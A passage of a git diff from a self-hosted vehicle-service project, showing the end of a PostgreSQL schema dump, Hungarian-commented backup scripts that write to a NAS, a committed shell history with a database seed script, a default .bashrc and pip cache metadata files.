Owner: kincses +-- + +ALTER TABLE ONLY data.vehicle_models + ADD CONSTRAINT vehicle_models_category_id_fkey FOREIGN KEY (category_id) REFERENCES data.vehicle_categories(id); + + +-- +-- Name: vehicle_ownership vehicle_ownership_user_id_fkey; Type: FK CONSTRAINT; Schema: data; Owner: kincses +-- + +ALTER TABLE ONLY data.vehicle_ownership + ADD CONSTRAINT vehicle_ownership_user_id_fkey FOREIGN KEY (user_id) REFERENCES data.users(id) ON DELETE CASCADE; + + +-- +-- Name: vehicle_ownership vehicle_ownership_vehicle_id_fkey; Type: FK CONSTRAINT; Schema: data; Owner: kincses +-- + +ALTER TABLE ONLY data.vehicle_ownership + ADD CONSTRAINT vehicle_ownership_vehicle_id_fkey FOREIGN KEY (vehicle_id) REFERENCES data.vehicles(id) ON DELETE CASCADE; + + +-- +-- Name: vehicle_variants vehicle_variants_model_id_fkey; Type: FK CONSTRAINT; Schema: data; Owner: kincses +-- + +ALTER TABLE ONLY data.vehicle_variants + ADD CONSTRAINT vehicle_variants_model_id_fkey FOREIGN KEY (model_id) REFERENCES data.vehicle_models(id); + + +-- +-- Name: vehicles vehicles_model_id_fkey; Type: FK CONSTRAINT; Schema: data; Owner: kincses +-- + +ALTER TABLE ONLY data.vehicles + ADD CONSTRAINT vehicles_model_id_fkey FOREIGN KEY (model_id) REFERENCES data.vehicle_models(id); + + +-- +-- Name: verification_tokens verification_tokens_user_id_fkey; Type: FK CONSTRAINT; Schema: data; Owner: kincses +-- + +ALTER TABLE ONLY data.verification_tokens + ADD CONSTRAINT verification_tokens_user_id_fkey FOREIGN KEY (user_id) REFERENCES data.users(id) ON DELETE CASCADE; + + +-- +-- Name: votes votes_provider_id_fkey; Type: FK CONSTRAINT; Schema: data; Owner: kincses +-- + +ALTER TABLE ONLY data.votes + ADD CONSTRAINT votes_provider_id_fkey FOREIGN KEY (provider_id) REFERENCES data.service_providers(id); + + +-- +-- Name: votes votes_user_id_fkey; Type: FK CONSTRAINT; Schema: data; Owner: kincses +-- + +ALTER TABLE ONLY data.votes + ADD CONSTRAINT votes_user_id_fkey FOREIGN KEY (user_id) REFERENCES data.users(id); + + +-- +-- PostgreSQL database dump complete +-- + +\unrestrict jRVVCTjjNeqN7io926QnQVJwr7IrvCK3DlzNPCoIfbivC5osmHT8eLuiehzRiDV + diff --git a/backup_manager.sh b/backup_manager.sh new file mode 100755 index 0000000..29dc429 --- /dev/null +++ b/backup_manager.sh @@ -0,0 +1,52 @@ +#!/bin/bash +# 🛡️ DOCKER INFRA - GFS BACKUP SYSTEM (Ubuntu 24.04 Optimized) + +# ÚJ ELÉRÉSI UTALOK +PROJECT_ROOT="/opt/docker" +NAS_ROOT="/mnt/nas/app_data/backups" +TIMESTAMP=$(date +"%Y%m%d_%H%M%S") +DOM=$(date +%d) +DOW=$(date +%u) + +# Szükséges mappák biztosítása a NAS-on +mkdir -p $NAS_ROOT/daily $NAS_ROOT/weekly $NAS_ROOT/monthly + +echo "--- 📦 Mentés indítása: $TIMESTAMP ---" + +# 1. ADATBÁZIS MENTÉS (Konzisztens SQL Dump) +# A shared-postgres konténerből kimentjük az összes adatbázist +docker exec shared-postgres pg_dumpall -c -U postgres > $PROJECT_ROOT/full_db_dump.sql + +# 2. TÖMÖRÍTÉS ÉS KONFIGURÁCIÓK MENTÉSE +# Kizárjuk a nyers adatbázis fájlokat és a felesleges node mappákat +BACKUP_FILE="infra_full_$TIMESTAMP.tar.gz" + +tar -czf /tmp/$BACKUP_FILE -C $PROJECT_ROOT \ + --exclude='infra/postgres/data' \ + --exclude='node_modules' \ + --exclude='*.log' \ + . + +# 3. GFS ROTÁCIÓS MÁSOLÁS +if [ "$DOM" == "01" ]; then + echo "Havi mentés rögzítése..." + cp /tmp/$BACKUP_FILE $NAS_ROOT/monthly/ +fi + +if [ "$DOW" == "7" ]; then + echo "Heti mentés rögzítése..." + cp /tmp/$BACKUP_FILE $NAS_ROOT/weekly/ +fi + +# Napi mentés +mv /tmp/$BACKUP_FILE $NAS_ROOT/daily/ + +# 4. AUTOMATIKUS TAKARÍTÁS (30 napos heti, 1 éves havi mentés megőrzése) +find $NAS_ROOT/daily -type f -mtime +7 -delete +find $NAS_ROOT/weekly -type f -mtime +30 -delete +find $NAS_ROOT/monthly -type f -mtime +365 -delete + +# 5. IDEIGLENES SQL DUMP TÖRLÉSE +rm $PROJECT_ROOT/full_db_dump.sql + +echo "✅ Mentés sikeresen lezárva: $NAS_ROOT/daily/$BACKUP_FILE" \ No newline at end of file diff --git a/backup_to_nas.sh b/backup_to_nas.sh new file mode 100755 index 0000000..c664c94 --- /dev/null +++ b/backup_to_nas.sh @@ -0,0 +1,20 @@ +#!/bin/bash +# Forrás és cél mappák meghatározása +SOURCE="/opt/service_finder" +DEST="/mnt/nas/git_vault/service_finder/backup" + +# Mappa létrehozása a NAS-on, ha még nincs ott +mkdir -p $DEST + +# Szinkronizálás (rsync) +# -a: archiválás (jogok megőrzése) +# -v: részletes naplózás +# -z: tömörítés az átvitel alatt +# --delete: törli a NAS-ról, amit te már töröltél a szerverről (tükrözés) +rsync -avz --delete --exclude 'postgres_data' --exclude 'node_modules' $SOURCE $DEST + +# Adatbázis mentés (külön, mert a futó fájlokat nem jó rsync-elni) +# Egy SQL dumpot készítünk közvetlenül a NAS-ra +docker exec postgres-db pg_dumpall -U postgres > $DEST/full_db_backup.sql + +echo "Mentés sikeresen befejeződött: $(date)" diff --git a/code-server-config/.bash_history b/code-server-config/.bash_history new file mode 100755 index 0000000..666ed01 --- /dev/null +++ b/code-server-config/.bash_history @@ -0,0 +1,95 @@ +sudo docker compose up -d +python3 /opt/service_finder/backend/scrapers/vehicle_master_data.py +pip install httpx beautifulsoup4 sqlalchemy asyncpg python-dotenv +ping service_finder_api -c 4 +docker ps +cd .. +docker ps +ls +cd project +ls +cat requirements.txt +docker network inspect service_finder_net +cd .. +docker network inspect service_finder_net +ping service_finder_api -c 4 +ls +cd projekt +ping service_finder_api -c 4 +API_IP=$(sudo docker inspect -f '{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' service_finder_api) +curl http://$API_IP:8000/vehicles +API_IP=$(sudo docker inspect -f '{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' service_finder_api) +sudo apt update +sudo apt install -y python3-pip +~pip3 install httpx beautifulsoup4 sqlalchemy asyncpg python-dotenv +pip3 install httpx beautifulsoup4 sqlalchemy asyncpg python-dotenv +python3 /opt/service_finder/backend/scrapers/vehicle_master_data.py +python3 backend/scrapers/vehicle_master_data.py +pip3 install httpx beautifulsoup4 sqlalchemy asyncpg python-dotenv +python3 backend/scrapers/vehicle_master_data.py +pip3 install httpx beautifulsoup4 sqlalchemy asyncpg python-dotenv --break-system-packages +python3 backend/scrapers/vehicle_master_data.py +ls +cd backend +ls +cd scrapers +ls +rm -f vehicle_master_data.py +sudo rm -f vehicle_master_data.py +ls +nano vehicle_master_data.py +sudo chown -R $USER:$USER . +cd .. +sudo chown -R $USER:$USER . +cat < backend/scrapers/vehicle_master_data.py +import asyncio +import os +from sqlalchemy.ext.asyncio import create_async_engine +from sqlalchemy import text +from dotenv import load_dotenv + +# .env betöltése +load_dotenv(os.path.join(os.path.dirname(__file__), '../../.env')) + +DATABASE_URL = os.getenv("DATABASE_URL") +if not DATABASE_URL: + print("HIBA: Nem találom a DATABASE_URL-t a .env fájlban!") + exit(1) + +# Adatkészlet +INITIAL_DATA = { + "BMW": ["3 Series", "5 Series", "X5", "R 1250 GS (Motor)"], + "Toyota": ["Corolla", "Yaris", "RAV4", "Hilux"], + "Volkswagen": ["Golf", "Passat", "Tiguan", "Polo"], + "Honda": ["Civic", "CR-V", "CB500X (Motor)", "Africa Twin (Motor)"], + "Audi": ["A3", "A4", "A6", "Q5"], + "Mercedes-Benz": ["C-Class", "E-Class", "S-Class", "G-Class"], + "Suzuki": ["Swift", "Vitara", "S-Cross", "DL 650 V-Strom (Motor)"] +} + +async def seed_vehicles(): + engine = create_async_engine(DATABASE_URL) + try: + async with engine.begin() as conn: + print(f"--- Csatlakozás az adatbázishoz... ---") + for make, models in INITIAL_DATA.items(): + await conn.execute(text("INSERT INTO ref.vehicle_makes (name) VALUES (:name) ON CONFLICT (name) DO NOTHING"), {"name": make}) + + result = await conn.execute(text("SELECT id FROM ref.vehicle_makes WHERE name = :name"), {"name": make}) + make_id = result.scalar() + + for model in models: + category = "Motor" if "(Motor)" in model else "Autó" + clean_model = model.replace(" (Motor)", "") + await conn.execute(text("INSERT INTO ref.vehicle_models (make_id, model_name, category) VALUES (:make_id, :name, :cat) ON CONFLICT DO NOTHING"), {"make_id": make_id, "name": clean_model, "cat": category}) + print(f"✅ Mentve: {make} -> {clean_model} ({category})") + print("\n--- SIKER! Az adatbázis feltöltése befejeződött. ---") + except Exception as e: + print(f"\n❌ HIBA TÖRTÉNT: {e}") + finally: + await engine.dispose() + +if __name__ == "__main__": + asyncio.run(seed_vehicles()) +EOF + diff --git a/code-server-config/.bashrc b/code-server-config/.bashrc new file mode 100755 index 0000000..f6939ee --- /dev/null +++ b/code-server-config/.bashrc @@ -0,0 +1,99 @@ +# ~/.bashrc: executed by bash(1) for non-login shells. +# see /usr/share/doc/bash/examples/startup-files (in the package bash-doc) +# for examples + +# If not running interactively, don't do anything +[ -z "$PS1" ] && return + +# don't put duplicate lines in the history. See bash(1) for more options +# ... or force ignoredups and ignorespace +HISTCONTROL=ignoredups:ignorespace + +# append to the history file, don't overwrite it +shopt -s histappend + +# for setting history length see HISTSIZE and HISTFILESIZE in bash(1) +HISTSIZE=1000 +HISTFILESIZE=2000 + +# check the window size after each command and, if necessary, +# update the values of LINES and COLUMNS. +shopt -s checkwinsize + +# make less more friendly for non-text input files, see lesspipe(1) +[ -x /usr/bin/lesspipe ] && eval "$(SHELL=/bin/sh lesspipe)" + +# set variable identifying the chroot you work in (used in the prompt below) +if [ -z "$debian_chroot" ] && [ -r /etc/debian_chroot ]; then + debian_chroot=$(cat /etc/debian_chroot) +fi + +# set a fancy prompt (non-color, unless we know we "want" color) +case "$TERM" in + xterm-color) color_prompt=yes;; +esac + +# uncomment for a colored prompt, if the terminal has the capability; turned +# off by default to not distract the user: the focus in a terminal window +# should be on the output of commands, not on the prompt +#force_color_prompt=yes + +if [ -n "$force_color_prompt" ]; then + if [ -x /usr/bin/tput ] && tput setaf 1 >&/dev/null; then + # We have color support; assume it's compliant with Ecma-48 + # (ISO/IEC-6429). (Lack of such support is extremely rare, and such + # a case would tend to support setf rather than setaf.) + color_prompt=yes + else + color_prompt= + fi +fi + +if [ "$color_prompt" = yes ]; then + PS1='${debian_chroot:+($debian_chroot)}\[\033[01;32m\]\u@\h\[\033[00m\]:\[\033[01;34m\]\w\[\033[00m\]\$ ' +else + PS1='${debian_chroot:+($debian_chroot)}\u@\h:\w\$ ' +fi +unset color_prompt force_color_prompt + +# If this is an xterm set the title to user@host:dir +case "$TERM" in +xterm*|rxvt*) + PS1="\[\e]0;${debian_chroot:+($debian_chroot)}\u@\h: \w\a\]$PS1" + ;; +*) + ;; +esac + +# enable color support of ls and also add handy aliases +if [ -x /usr/bin/dircolors ]; then + test -r ~/.dircolors && eval "$(dircolors -b ~/.dircolors)" || eval "$(dircolors -b)" + alias ls='ls --color=auto' + #alias dir='dir --color=auto' + #alias vdir='vdir --color=auto' + + alias grep='grep --color=auto' + alias fgrep='fgrep --color=auto' + alias egrep='egrep --color=auto' +fi + +# some more ls aliases +alias ll='ls -alF' +alias la='ls -A' +alias l='ls -CF' + +# Alias definitions. +# You may want to put all your additions into a separate file like +# ~/.bash_aliases, instead of adding them here directly. +# See /usr/share/doc/bash-doc/examples in the bash-doc package. + +if [ -f ~/.bash_aliases ]; then + . ~/.bash_aliases +fi + +# enable programmable completion features (you don't need to enable +# this, if it's already enabled in /etc/bash.bashrc and /etc/profile +# sources /etc/bash.bashrc). +#if [ -f /etc/bash_completion ] && ! shopt -oq posix; then +# . /etc/bash_completion +#fi diff --git a/code-server-config/.cache/Microsoft/DeveloperTools/deviceid b/code-server-config/.cache/Microsoft/DeveloperTools/deviceid new file mode 100755 index 0000000..d27c133 --- /dev/null +++ b/code-server-config/.cache/Microsoft/DeveloperTools/deviceid @@ -0,0 +1 @@ +b5dbfcec-d709-4c74-ab40-0013b288137b \ No newline at end of file diff --git a/code-server-config/.cache/pip/http-v2/0/4/8/4/7/0484760df79b094114efd54bf890371889276bd276c1334d1207ab57 b/code-server-config/.cache/pip/http-v2/0/4/8/4/7/0484760df79b094114efd54bf890371889276bd276c1334d1207ab57 new file mode 100755 index 0000000..c32acbf Binary files /dev/null and b/code-server-config/.cache/pip/http-v2/0/4/8/4/7/0484760df79b094114efd54bf890371889276bd276c1334d1207ab57 differ diff --git a/code-server-config/.cache/pip/http-v2/0/4/8/4/7/0484760df79b094114efd54bf890371889276bd276c1334d1207ab57.body b/code-server-config/.cache/pip/http-v2/0/4/8/4/7/0484760df79b094114efd54bf890371889276bd276c1334d1207ab57.body new file mode 100755 index 0000000..470e77a Binary files /dev/null and b/code-server-config/.cache/pip/http-v2/0/4/8/4/7/0484760df79b094114efd54bf890371889276bd276c1334d1207ab57.body differ diff --git a/code-server-config/.cache/pip/http-v2/0/5/a/7/4/05a74540eb65ad078e4e70140f951919d2248dc11cb1db5ccba5484a b/code-server-config/.cache/pip/http-v2/0/5/a/7/4/05a74540eb65ad078e4e70140f951919d2248dc11cb1db5ccba5484a new file mode 100755 index 0000000..baf18b6 Binary files /dev/null and b/code-server-config/.cache/pip/http-v2/0/5/a/7/4/05a74540eb65ad078e4e70140f951919d2248dc11cb1db5ccba5484a differ diff --git a/code-server-config/.cache/pip/http-v2/0/5/a/7/4/05a74540eb65ad078e4e70140f951919d2248dc11cb1db5ccba5484a.body b/code-server-config/.cache/pip/http-v2/0/5/a/7/4/05a74540eb65ad078e4e70140f951919d2248dc11cb1db5ccba5484a.body new file mode 100755 index 0000000..b09cb50 --- /dev/null +++ b/code-server-config/.cache/pip/http-v2/0/5/a/7/4/05a74540eb65ad078e4e70140f951919d2248dc11cb1db5ccba5484a.body @@ -0,0 +1,72 @@ +Metadata-Version: 2.4 +Name: typing_extensions +Version: 4.15.0 +Summary: Backported and Experimental Type Hints for Python 3.9+ +Keywords: annotations,backport,checker,checking,function,hinting,hints,type,typechecking,typehinting,typehints,typing +Author-email: "Guido van Rossum, Jukka Lehtosalo, Łukasz Langa, Michael Lee" +Requires-Python: >=3.9 +Description-Content-Type: text/markdown +License-Expression: PSF-2.0 +Classifier: Development Status :: 5 - Production/Stable +Classifier: Environment :: Console +Classifier: Intended Audience :: Developers +Classifier: Operating System :: OS Independent +Classifier: Programming Language :: Python :: 3 +Classifier: Programming Language :: Python :: 3 :: Only +Classifier: Programming Language :: Python :: 3.9 +Classifier: Programming Language :: Python :: 3.10 +Classifier: Programming Language :: Python :: 3.11 +Classifier: Programming Language :: Python :: 3.12 +Classifier: Programming Language :: Python :: 3.13 +Classifier: Programming Language :: Python :: 3.14 +Classifier: Topic :: Software Development +License-File: LICENSE +Project-URL: Bug Tracker, https://github.com/python/typing_extensions/issues +Project-URL: Changes, https://github.com/python/typing_extensions/blob/main/CHANGELOG.md +Project-URL: Documentation, https://typing-extensions.readthedocs.io/ +Project-URL: Home, https://github.com/python/typing_extensions +Project-URL: Q & A, https://github.com/python/typing/discussions +Project-URL: Repository, https://github.com/python/typing_extensions + +# Typing Extensions + +[![Chat at https://gitter.im/python/typing](https://badges.gitter.im/python/typing.svg)](https://gitter.im/python/typing) + +[Documentation](https://typing-extensions.readthedocs.io/en/latest/#) – +[PyPI](https://pypi.org/project/typing-extensions/) + +## Overview + +The `typing_extensions` module serves two related purposes: + +- Enable use of new type system features on older Python versions. For example, + `typing.TypeGuard` is new in Python 3.10, but `typing_extensions` allows + users on previous Python versions to use it too. +- Enable experimentation with new type system PEPs before they are accepted and + added to the `typing` module. + +`typing_extensions` is treated specially by static type checkers such as +mypy and pyright. Objects defined in `typing_extensions` are treated the same +way as equivalent forms in `typing`. + +`typing_extensions` uses +[Semantic Versioning](https://semver.org/). The +major version will be incremented only for backwards-incompatible changes. +Therefore, it's safe to depend +on `typing_extensions` like this: `typing_extensions ~=x.y`, +where `x.y` is the first version that includes all features you need. +[This](https://packaging.python.org/en/latest/specifications/version-specifiers/#compatible-release) +is equivalent to `typing_extensions >=x.y, <(x+1)`. Do not depend on `~= x.y.z` +unless you really know what you're doing; that defeats the purpose of +semantic versioning. + +## Included items + +See [the documentation](https://typing-extensions.readthedocs.io/en/latest/#) for a +complete listing of module contents. + +## Contributing + +See [CONTRIBUTING.md](https://github.com/python/typing_extensions/blob/main/CONTRIBUTING.md) +for how to contribute to `typing_extensions`. + diff --git a/code-server-config/.cache/pip/http-v2/0/a/e/8/4/0ae84cda1068eb8069d0d031ff1b592b6ce0646c279bf59396ff2d05 b/code-server-config/.cache/pip/http-v2/0/a/e/8/4/0ae84cda1068eb8069d0d031ff1b592b6ce0646c279bf59396ff2d05 new file mode 100755 index 0000000..93d0bde Binary files /dev/null and b/code-server-config/.cache/pip/http-v2/0/a/e/8/4/0ae84cda1068eb8069d0d031ff1b592b6ce0646c279bf59396ff2d05 differ diff --git a/code-server-config/.cache/pip/http-v2/0/a/e/8/4/0ae84cda1068eb8069d0d031ff1b592b6ce0646c279bf59396ff2d05.body b/code-server-config/.cache/pip/http-v2/0/a/e/8/4/0ae84cda1068eb8069d0d031ff1b592b6ce0646c279bf59396ff2d05.body new file mode 100755 index 0000000..2f74555 Binary files /dev/null and b/code-server-config/.cache/pip/http-v2/0/a/e/8/4/0ae84cda1068eb8069d0d031ff1b592b6ce0646c279bf59396ff2d05.body differ diff --git a/code-server-config/.cache/pip/http-v2/1/2/9/c/8/129c8212d0fe217a753409b4b46ca21c6dd736c8b4e08c093d03ecf3 b/code-server-config/.cache/pip/http-v2/1/2/9/c/8/129c8212d0fe217a753409b4b46ca21c6dd736c8b4e08c093d03ecf3 new file mode 100755 index 0000000..929ed30 Binary files /dev/null and b/code-server-config/.cache/pip/http-v2/1/2/9/c/8/129c8212d0fe217a753409b4b46ca21c6dd736c8b4e08c093d03ecf3 differ diff --git a/code-server-config/.cache/pip/http-v2/1/2/9/c/8/129c8212d0fe217a753409b4b46ca21c6dd736c8b4e08c093d03ecf3.body b/code-server-config/.cache/pip/http-v2/1/2/9/c/8/129c8212d0fe217a753409b4b46ca21c6dd736c8b4e08c093d03ecf3.body new file mode 100755 index 0000000..48c7f5e Binary files /dev/null and b/code-server-config/.cache/pip/http-v2/1/2/9/c/8/129c8212d0fe217a753409b4b46ca21c6dd736c8b4e08c093d03ecf3.body differ diff --git a/code-server-config/.cache/pip/http-v2/1/4/a/a/f/14aaf7643dce3f389cfaa2f24beba9e2d02071e4624c02c288b2a440 b/code-server-config/.cache/pip/http-v2/1/4/a/a/f/14aaf7643dce3f389cfaa2f24beba9e2d02071e4624c02c288b2a440 new file mode 100755 index 0000000..bc08150 Binary files /dev/null and b/code-server-config/.cache/pip/http-v2/1/4/a/a/f/14aaf7643dce3f389cfaa2f24beba9e2d02071e4624c02c288b2a440 differ diff --git a/code-server-config/.cache/pip/http-v2/1/4/a/a/f/14aaf7643dce3f389cfaa2f24beba9e2d02071e4624c02c288b2a440.body b/code-server-config/.cache/pip/http-v2/1/4/a/a/f/14aaf7643dce3f389cfaa2f24beba9e2d02071e4624c02c288b2a440.body new file mode 100755 index 0000000..0a9780e Binary files /dev/null and b/code-server-config/.cache/pip/http-v2/1/4/a/a/f/14aaf7643dce3f389cfaa2f24beba9e2d02071e4624c02c288b2a440.body differ diff --git a/code-server-config/.cache/pip/http-v2/1/6/0/d/3/160d3e8f69a7eca4743b16bea3eecb80155f94e8435ce6481997004c b/code-server-config/.cache/pip/http-v2/1/6/0/d/3/160d3e8f69a7eca4743b16bea3eecb80155f94e8435ce6481997004c new file mode 100755 index 0000000..f606b67 Binary files /dev/null and b/code-server-config/.cache/pip/http-v2/1/6/0/d/3/160d3e8f69a7eca4743b16bea3eecb80155f94e8435ce6481997004c differ diff --git a/code-server-config/.cache/pip/http-v2/1/6/0/d/3/160d3e8f69a7eca4743b16bea3eecb80155f94e8435ce6481997004c.body b/code-server-config/.cache/pip/http-v2/1/6/0/d/3/160d3e8f69a7eca4743b16bea3eecb80155f94e8435ce6481997004c.body new file mode 100755 index 0000000..74013b8 Binary files /dev/null and b/code-server-config/.cache/pip/http-v2/1/6/0/d/3/160d3e8f69a7eca4743b16bea3eecb80155f94e8435ce6481997004c.body differ diff --git a/code-server-config/.cache/pip/http-v2/1/9/9/d/1/199d128a8b0a6a727869cf288f0802d0ddfe7785a99b6957366e40a4 b/code-server-config/.cache/pip/http-v2/1/9/9/d/1/199d128a8b0a6a727869cf288f0802d0ddfe7785a99b6957366e40a4 new file mode 100755 index 0000000..8b431c1 Binary files /dev/null and b/code-server-config/.cache/pip/http-v2/1/9/9/d/1/199d128a8b0a6a727869cf288f0802d0ddfe7785a99b6957366e40a4 differ diff --git a/code-server-config/.cache/pip/http-v2/1/9/9/d/1/199d128a8b0a6a727869cf288f0802d0ddfe7785a99b6957366e40a4.body b/code-server-config/.cache/pip/http-v2/1/9/9/d/1/199d128a8b0a6a727869cf288f0802d0ddfe7785a99b6957366e40a4.body new file mode 100755 index 0000000..98c8ca4 Binary files /dev/null and b/code-server-config/.cache/pip/http-v2/1/9/9/d/1/199d128a8b0a6a727869cf288f0802d0ddfe7785a99b6957366e40a4.body differ diff --git a/code-server-config/.cache/pip/http-v2/1/c/b/6/2/1cb62cfa729fe0a5b07499a3ba93e1da9751c5f79bd2e594bcf319a9 b/code-server-config/.cache/pip/http-v2/1/c/b/6/2/1cb62cfa729fe0a5b07499a3ba93e1da9751c5f79bd2e594bcf319a9 new file mode 100755 index 0000000..36f2cd8 Binary files /dev/null and b/code-server-config/.cache/pip/http-v2/1/c/b/6/2/1cb62cfa729fe0a5b07499a3ba93e1da9751c5f79bd2e594bcf319a9 differ diff --git a/code-server-config/.cache/pip/http-v2/1/c/b/6/2/1cb62cfa729fe0a5b07499a3ba93e1da9751c5f79bd2e594bcf319a9.body b/code-server-config/.cache/pip/http-v2/1/c/b/6/2/1cb62cfa729fe0a5b07499a3ba93e1da9751c5f79bd2e594bcf319a9.body new file mode 100755 index 0000000..6ed6e06 Binary files /dev/null and b/code-server-config/.cache/pip/http-v2/1/c/b/6/2/1cb62cfa729fe0a5b07499a3ba93e1da9751c5f79bd2e594bcf319a9.body differ diff --git a/code-server-config/.cache/pip/http-v2/2/8/8/5/1/28851bfda9e7b366cbac79b783dc038d1fee039b3e50c3151b437013 b/code-server-config/.cache/pip/http-v2/2/8/8/5/1/28851bfda9e7b366cbac79b783dc038d1fee039b3e50c3151b437013 new file mode 100755 index 0000000..15d3007 Binary files /dev/null and b/code-server-config/.cache/pip/http-v2/2/8/8/5/1/28851bfda9e7b366cbac79b783dc038d1fee039b3e50c3151b437013 differ diff --git a/code-server-config/.cache/pip/http-v2/2/8/8/5/1/28851bfda9e7b366cbac79b783dc038d1fee039b3e50c3151b437013.body b/code-server-config/.cache/pip/http-v2/2/8/8/5/1/28851bfda9e7b366cbac79b783dc038d1fee039b3e50c3151b437013.body new file mode 100755 index 0000000..3287809 Binary files /dev/null and b/code-server-config/.cache/pip/http-v2/2/8/8/5/1/28851bfda9e7b366cbac79b783dc038d1fee039b3e50c3151b437013.body differ diff --git a/code-server-config/.cache/pip/http-v2/2/c/5/0/9/2c5093416a6abc33fb0ff1433322d374c320a79a2ce63946a0a9ddf3 b/code-server-config/.cache/pip/http-v2/2/c/5/0/9/2c5093416a6abc33fb0ff1433322d374c320a79a2ce63946a0a9ddf3 new file mode 100755 index 0000000..be03b13 Binary files /dev/null and b/code-server-config/.cache/pip/http-v2/2/c/5/0/9/2c5093416a6abc33fb0ff1433322d374c320a79a2ce63946a0a9ddf3 differ diff --git a/code-server-config/.cache/pip/http-v2/2/c/5/0/9/2c5093416a6abc33fb0ff1433322d374c320a79a2ce63946a0a9ddf3.body b/code-server-config/.cache/pip/http-v2/2/c/5/0/9/2c5093416a6abc33fb0ff1433322d374c320a79a2ce63946a0a9ddf3.body new file mode 100755 index 0000000..28f2c10 Binary files /dev/null and b/code-server-config/.cache/pip/http-v2/2/c/5/0/9/2c5093416a6abc33fb0ff1433322d374c320a79a2ce63946a0a9ddf3.body differ diff --git a/code-server-config/.cache/pip/http-v2/3/0/e/f/1/30ef132248ab98ab0a92d2d15ee6957bdad5542ffbb630d3a32f7721 b/code-server-config/.cache/pip/http-v2/3/0/e/f/1/30ef132248ab98ab0a92d2d15ee6957bdad5542ffbb630d3a32f7721 new file mode 100755 index 0000000..3bb56a9 Binary files /dev/null and b/code-server-config/.cache/pip/http-v2/3/0/e/f/1/30ef132248ab98ab0a92d2d15ee6957bdad5542ffbb630d3a32f7721 differ diff --git a/code-server-config/.cache/pip/http-v2/3/0/e/f/1/30ef132248ab98ab0a92d2d15ee6957bdad5542ffbb630d3a32f7721.body b/code-server-config/.cache/pip/http-v2/3/0/e/f/1/30ef132248ab98ab0a92d2d15ee6957bdad5542ffbb630d3a32f7721.body new file mode 100755 index 0000000..f12b3ce Binary files /dev/null and b/code-server-config/.cache/pip/http-v2/3/0/e/f/1/30ef132248ab98ab0a92d2d15ee6957bdad5542ffbb630d3a32f7721.body differ diff --git a/code-server-config/.cache/pip/http-v2/3/d/b/a/4/3dba48e33e4deae5b8e0b5d8173f7d8b9ede86f6e2f3b423cb213061 b/code-server-config/.cache/pip/http-v2/3/d/b/a/4/3dba48e33e4deae5b8e0b5d8173f7d8b9ede86f6e2f3b423cb213061 new file mode 100755 index 0000000..8fe5a5b Binary files /dev/null and b/code-server-config/.cache/pip/http-v2/3/d/b/a/4/3dba48e33e4deae5b8e0b5d8173f7d8b9ede86f6e2f3b423cb213061 differ diff --git a/code-server-config/.cache/pip/http-v2/3/d/b/a/4/3dba48e33e4deae5b8e0b5d8173f7d8b9ede86f6e2f3b423cb213061.body b/code-server-config/.cache/pip/http-v2/3/d/b/a/4/3dba48e33e4deae5b8e0b5d8173f7d8b9ede86f6e2f3b423cb213061.body new file mode 100755 index 0000000..3364ae3 Binary files /dev/null and b/code-server-config/.cache/pip/http-v2/3/d/b/a/4/3dba48e33e4deae5b8e0b5d8173f7d8b9ede86f6e2f3b423cb213061.body differ diff --git a/code-server-config/.cache/pip/http-v2/4/b/e/0/7/4be07d3ac353e38d2c9e3a257cad36ee2a758fc88b4cd5f0d479a5a9 b/code-server-config/.cache/pip/http-v2/4/b/e/0/7/4be07d3ac353e38d2c9e3a257cad36ee2a758fc88b4cd5f0d479a5a9 new file mode 100755 index 0000000..8ce1072 Binary files /dev/null and b/code-server-config/.cache/pip/http-v2/4/b/e/0/7/4be07d3ac353e38d2c9e3a257cad36ee2a758fc88b4cd5f0d479a5a9 differ diff --git a/code-server-config/.cache/pip/http-v2/4/b/e/0/7/4be07d3ac353e38d2c9e3a257cad36ee2a758fc88b4cd5f0d479a5a9.body b/code-server-config/.cache/pip/http-v2/4/b/e/0/7/4be07d3ac353e38d2c9e3a257cad36ee2a758fc88b4cd5f0d479a5a9.body new file mode 100755 index 0000000..4d8f88b Binary files /dev/null and b/code-server-config/.cache/pip/http-v2/4/b/e/0/7/4be07d3ac353e38d2c9e3a257cad36ee2a758fc88b4cd5f0d479a5a9.body differ diff --git a/code-server-config/.cache/pip/http-v2/5/5/2/5/6/55256db6e6c4a92962a75c471feaebd79e275a5b686bc92196b908dd b/code-server-config/.cache/pip/http-v2/5/5/2/5/6/55256db6e6c4a92962a75c471feaebd79e275a5b686bc92196b908dd new file mode 100755 index 0000000..3dc7ded Binary files /dev/null and b/code-server-config/.cache/pip/http-v2/5/5/2/5/6/55256db6e6c4a92962a75c471feaebd79e275a5b686bc92196b908dd differ diff --git a/code-server-config/.cache/pip/http-v2/5/5/2/5/6/55256db6e6c4a92962a75c471feaebd79e275a5b686bc92196b908dd.body b/code-server-config/.cache/pip/http-v2/5/5/2/5/6/55256db6e6c4a92962a75c471feaebd79e275a5b686bc92196b908dd.body new file mode 100755 index 0000000..5e275a7 --- /dev/null +++ b/code-server-config/.cache/pip/http-v2/5/5/2/5/6/55256db6e6c4a92962a75c471feaebd79e275a5b686bc92196b908dd.body @@ -0,0 +1,243 @@ +Metadata-Version: 2.4 +Name: SQLAlchemy +Version: 2.0.45 +Summary: Database Abstraction Library +Home-page: https://www.sqlalchemy.org +Author: Mike Bayer +Author-email: mike_mp@zzzcomputing.com +License: MIT +Project-URL: Documentation, https://docs.sqlalchemy.org +Project-URL: Issue Tracker, https://github.com/sqlalchemy/sqlalchemy/ +Classifier: Development Status :: 5 - Production/Stable +Classifier: Intended Audience :: Developers +Classifier: Operating System :: OS Independent +Classifier: Programming Language :: Python +Classifier: Programming Language :: Python :: 3 +Classifier: Programming Language :: Python :: 3.7 +Classifier: Programming Language :: Python :: 3.8 +Classifier: Programming Language :: Python :: 3.9 +Classifier: Programming Language :: Python :: 3.10 +Classifier: Programming Language :: Python :: 3.11 +Classifier: Programming Language :: Python :: 3.12 +Classifier: Programming Language :: Python :: 3.13 +Classifier: Programming Language :: Python :: Implementation :: CPython +Classifier: Programming Language :: Python :: Implementation :: PyPy +Classifier: Topic :: Database :: Front-Ends +Requires-Python: >=3.7 +Description-Content-Type: text/x-rst +License-File: LICENSE +Requires-Dist: importlib-metadata; python_version < "3.8" +Requires-Dist: greenlet>=1; platform_machine == "aarch64" or (platform_machine == "ppc64le" or (platform_machine == "x86_64" or (platform_machine == "amd64" or (platform_machine == "AMD64" or (platform_machine == "win32" or platform_machine == "WIN32"))))) +Requires-Dist: typing-extensions>=4.6.0 +Provides-Extra: asyncio +Requires-Dist: 